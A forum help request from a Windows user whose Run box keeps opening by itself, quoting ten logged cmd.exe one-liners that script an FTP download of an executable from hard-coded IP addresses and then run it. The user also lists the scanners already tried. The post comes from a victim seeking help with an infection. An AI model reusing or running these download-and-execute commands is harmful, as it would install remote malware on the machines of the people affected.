Hello Experts-
Here is a tasty one... at random intervals the run window from start>Run pops up and starts populating with text that tries to download a file from the internet... rather disturbing.
The specifics in the command changes over time but here is what it has been:
cmd.exe /c del i&echo open 75.109.91.254 15389 > i&echo user 1 1 >> i &echo get 576.exe >> i &echo quit >> i &ftp -n -s:i &576.exe&del i&exit
cmd.exe /c del i&echo open 75.109.94.103 1395 > i&echo user 1 1 >> i &echo get 260.exe >> i &echo quit >> i &ftp -n -s:i &260.exe&del i&exit
cmd.exe /c del i&echo open 75.109.100.153 21077 > i&echo user 1 1 >> i &echo get 252.exe >> i &echo quit >> i &ftp -n -s:i &252.exe&del i&exit
cmd.exe /c del i&echo open 75.109.91.254 15389 > i&echo user 1 1 >> i &echo get 362.exe >> i &echo quit >> i &ftp -n -s:i &362.exe&del i&exit
cmd.exe /c del i&echo open 75.109.92.200 10280 > i&echo user 1 1 >> i &echo get 077.exe >> i &echo quit >> i &ftp -n -s:i &077.exe&del i&exit
cmd.exe /c del i&echo open 75.109.100.40 13822 > i&echo user 1 1 >> i &echo get 822.exe >> i &echo quit >> i &ftp -n -s:i &822.exe&del i&exit
cmd.exe /c del i&echo open 75.109.94.103 1395 > i&echo user 1 1 >> i &echo get 444.exe >> i &echo quit >> i &ftp -n -s:i &444.exe&del i&exit
cmd.exe /c del i&echo open 75.109.92.200 10280 > i&echo user 1 1 >> i &echo get 016.exe >> i &echo quit >> i &ftp -n -s:i &016.exe&del i&exit
cmd.exe /c del i&echo open 75.109.94.103 1395 > i&echo user 1 1 >> i &echo get 107.exe >> i &echo quit >> i &ftp -n -s:i &107.exe&del i&exit
cmd.exe /c del i&echo open 75.109.91.254 15389 > i&echo user 1 1 >> i &echo get 576.exe >> i &echo quit >> i &ftp -n -s:i &576.exe&del i&exit
To this point none of the attempts have been successful in bringing down a "real" payload, but it is pretty annoying.
I have tried running symantec AV, ewido, sophos rootkit revealer, sysinternals rootkit revealer, hijackthis, and ccleaner and not found the culprit.
Any assistance would be appreciated.
Thanks in advance,
t
Start Free Trial
